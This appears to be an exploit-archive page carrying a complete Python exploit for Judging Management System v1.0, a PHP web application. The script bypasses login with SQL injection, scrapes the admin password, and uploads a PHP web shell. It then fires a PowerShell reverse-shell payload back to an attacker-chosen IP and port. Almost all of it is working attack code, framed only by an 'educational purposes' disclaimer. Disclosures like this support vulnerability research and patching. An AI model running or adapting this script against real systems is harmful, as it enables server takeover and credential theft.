Judging management system v1.0 remote code execution (rce) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2023-03-31 | Type : webapps | Platform : php
This exploit / vulnerability Judging management system v1.0 remote code execution (rce) is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

# Exploit Title: Judging Management System v1.0 - Remote Code Execution (RCE)
# Date: 12/11/2022
# Exploit Author: Angelo Pio Amirante
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html
# Version: 1.0
# Tested on: Windows 10 on XAAMP server


import requests,argparse,re,time,base64
import urllib.parse
from colorama import (Fore as F,Back as B,Style as S)
from bs4 import BeautifulSoup


BANNER = """
╔═══════════════════════════════════════════════════════════════════════════════════════════════════════╗
║ Judging Management System v1.0 - Auth Bypass + Unrestricted File Upload = Remote Code Execution (RCE) ║
╚═══════════════════════════════════════════════════════════════════════════════════════════════════════╝

"""

def argsetup():
desc = S.BRIGHT + 'Judging Management System v1.0 - Remote Code Execution (RCE)'
parser = argparse.ArgumentParser(description=desc)
parser.add_argument('-t', '--target', help='Target URL, Ex: http://localhost/php-jms', required=True)
parser.add_argument('-l', '--listenip', help='Listening address required to receive reverse shell', required=True)
parser.add_argument('-lp','--listenport', help='Listening port required to receive reverse shell', required=True)
args = parser.parse_args()
return args

# Performs Auth bypass in order to get the admin cookie
def auth_bypass(args):
print(F.CYAN+"[+] Login into the application through Auth Bypass vulnerability...")
session = requests.Session()
loginUrl = f"{args.target}/login.php"

username = """' OR 1=1-- -"""
password = "randomvalue1234"
data = {'username': username, 'password': password}

login = session.post(loginUrl,verify=False,data=data)
admin_cookie = login.cookies['PHPSESSID']
print(F.GREEN+"[+] Admin cookies obtained !!!")
return admin_cookie

# Checks if the file has been uploaded to /uploads directory
def check_file(args,cookie):
uploads_endpoint = f"{args.target}/uploads/"
cookies = {'PHPSESSID': f'{cookie}'}
req = requests.get(uploads_endpoint,verify=False,cookies=cookies)
soup = BeautifulSoup(req.text,features='html.parser')
files = soup.find_all("a")
for i in range (len(files)):
match = re.search(".*-shelljudgesystem\.php",files[i].get('href'))
if match:
file = files[i].get('href')
print(F.CYAN+"[+] The webshell is at the following Url: "+f"{args.target}/uploads/"+file)
return file


return None

def file_upload(args,cookie):
now = int(time.time())
endpoint = f"{args.target}/edit_organizer.php"
cookies = {'wp-settings-time-1':f"{now}",'PHPSESSID': f'{cookie}'}
get_req = requests.get(endpoint,verify=False,cookies=cookies)
soup = BeautifulSoup(get_req.text,features='html.parser')
username = soup.find("input",{"name":"username"}).get('value')
admin_password = soup.find("input",{"id":"password"}).get('value')
print(F.GREEN + "[+] Admin username: " + username)
print(F.GREEN + "[+] Admin password: " + admin_password)


# Multi-part request
file_dict = {
'fname':(None,"Random"),
'mname':(None,"Random"),
'lname':(None,"Random"),
'email':(None,"ranom@mail.com"),
'pnum':(None,"014564343"),
'cname':(None,"Random"),
'caddress':(None,"Random"),
'ctelephone':(None,"928928392"),
'cemail':(None,"company@mail.com"),
'cwebsite':(None,"http://company.com"),
'file':("shelljudgesystem.php","<?php system($_REQUEST['cmd']) ?>","application/octet-stream"),
'username':(None,f"{admin_password}"),
'passwordx':(None,f"{admin_password}"),
'password2x':(None,f"{admin_password}"),
'password':(None,f"{admin_password}"),
'update':(None,"")
}

req = requests.post(endpoint,verify=False,cookies=cookies,files=file_dict)


def exploit(args,cookie,file):
payload = f"""powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient('{args.listenip}',{args.listenport})%3b"""+"""$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0){%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()" """
uploads_endpoint = f"{args.target}/uploads/{file}?cmd={payload}"
cookies = {'PHPSESSID': f'{cookie}'}
print(F.GREEN + "\n[+] Enjoy your reverse shell ")
requests.get(uploads_endpoint,verify=False,cookies=cookies)



if __name__ == '__main__':
print(F.CYAN + BANNER)
args = argsetup()
cookie=auth_bypass(args=args)
file_upload(args=args,cookie=cookie)
file_name=check_file(args=args,cookie=cookie)
if file_name is not None:
exploit(args=args,cookie=cookie,file=file_name)

else:
print(F.RED + "[!] File not found")